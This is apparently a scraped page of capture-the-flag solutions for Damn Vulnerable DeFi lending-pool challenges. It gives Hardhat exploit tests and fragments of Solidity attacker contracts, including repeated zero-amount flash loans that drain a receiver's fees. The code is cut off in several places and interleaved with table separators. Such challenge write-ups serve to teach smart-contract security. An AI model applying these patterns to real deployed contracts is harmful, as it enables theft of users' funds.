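it('Exploit', async function () {
  // connect() returns a new contract instance bound to the given signer; it
  // does not rebind this.pool. The result must be kept, otherwise the calls
  // below go out from the default signer rather than from `attacker`.
  const poolAsAttacker = this.pool.connect(attacker);

  // Review note: these loans are requested on the receiver's behalf by an
  // account that is not the receiver, with an amount of 0. If the receiver is
  // charged per loan (fee logic is not shown here; confirm in the contracts),
  // the fix belongs on-chain: the pool should only accept a loan requested by
  // the borrower itself, or the receiver should check who initiated the loan.
  for (let round = 1; round <= 10; round++) {
    // Awaited one by one so transactions are sent in order and a revert
    // fails the test instead of becoming an unhandled rejection.
    await poolAsAttacker.flashLoan(this.receiver.address, 0);
  }

  // Informational only: the balance is printed, not asserted.
  console.log(await ethers.provider.getBalance(this.receiver.address));
});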
it('Exploit', async function () { | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
this.pool.connect(attacker).flashLoan(this.receiver.address,0) |
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; | |
import "@openzeppelin/contracts/utils/Address.sol"; | |
import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
/** | |
* @title TrusterLenderPool |
contract TrusterExploiter { | |
TrusterLenderPool public immutable pool; | |
IERC20 public immutable token; | |
/// @notice Stores the two contract addresses this helper works against.
/// @dev Both fields are immutable, so they are fixed at deployment.
///      Neither address is validated here.
/// @param _pool  Address wrapped as a TrusterLenderPool.
/// @param _token Address wrapped as an IERC20.
constructor(address _pool, address _token) {
    token = IERC20(_token);
    pool = TrusterLenderPool(_pool);
}
function attack() external { |
it('Exploit', async function () {
  // Deploy the helper contract from the attacker account, pointing it at the
  // pool and the token used by this test.
  const exploiterFactory = await ethers.getContractFactory("TrusterExploiter", attacker);
  this.exploit = await exploiterFactory.deploy(this.pool.address, this.token.address);

  // attack() lives in the helper contract; its body is not part of this test.
  const exploitAsAttacker = this.exploit.connect(attacker);
  await exploitAsAttacker.attack();

  // Informational only: the pool's token balance is printed, not asserted.
  const label = "Updated pool balance is: ";
  const poolTokenBalance = await this.token.balanceOf(this.pool.address);
  console.log(label, poolTokenBalance);
});
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import "@openzeppelin/contracts/utils/Address.sol"; | |
/// @notice Callback interface with a single entry point, `execute`.
/// @dev `execute` is external and payable, so ether can be sent along with
///      the call. The caller is not shown in this excerpt; presumably the
///      lending pool invokes it during a flash loan (confirm against the
///      pool contract).
interface IFlashLoanEtherReceiver {
    function execute() external payable;
}
/** |
contract AttackerContract { | |
SideEntranceLenderPool pool; | |
address payable attacker; | |
/// @notice Records the pool to interact with and the deploying account.
/// @dev `attacker` is set to the deployer (msg.sender), cast to payable.
///      `_pool` is not validated here.
/// @param _pool Address wrapped as a SideEntranceLenderPool.
constructor(address _pool) {
    attacker = payable(msg.sender);
    pool = SideEntranceLenderPool(_pool);
}
function exploit(uint256 amount) public { |
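it('Exploit', async function () {
  // Deploy the helper contract from the attacker account.
  const AttackerContract = await ethers.getContractFactory("AttackerContract", attacker);

  // pool.address is read as a plain property (the other tests on this page do
  // the same), so the extra await around it was redundant.
  this.exploit = await AttackerContract.deploy(this.pool.address);

  // Awaited so the test cannot finish before the transaction settles, and so
  // a revert fails the test instead of surfacing as an unhandled rejection.
  await this.exploit.connect(attacker).exploit(ETHER_IN_POOL);
});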
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
import "@openzeppelin/contracts/token/ERC20/extensions/ERC20Snapshot.sol"; | |
import "@openzeppelin/contracts/utils/Address.sol"; | |
import "./SimpleGovernance.sol"; | |
/** | |
* @title SelfiePool |
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
... | |
contract SimpleGovernance { | |
... | |
struct GovernanceAction { | |
address receiver; |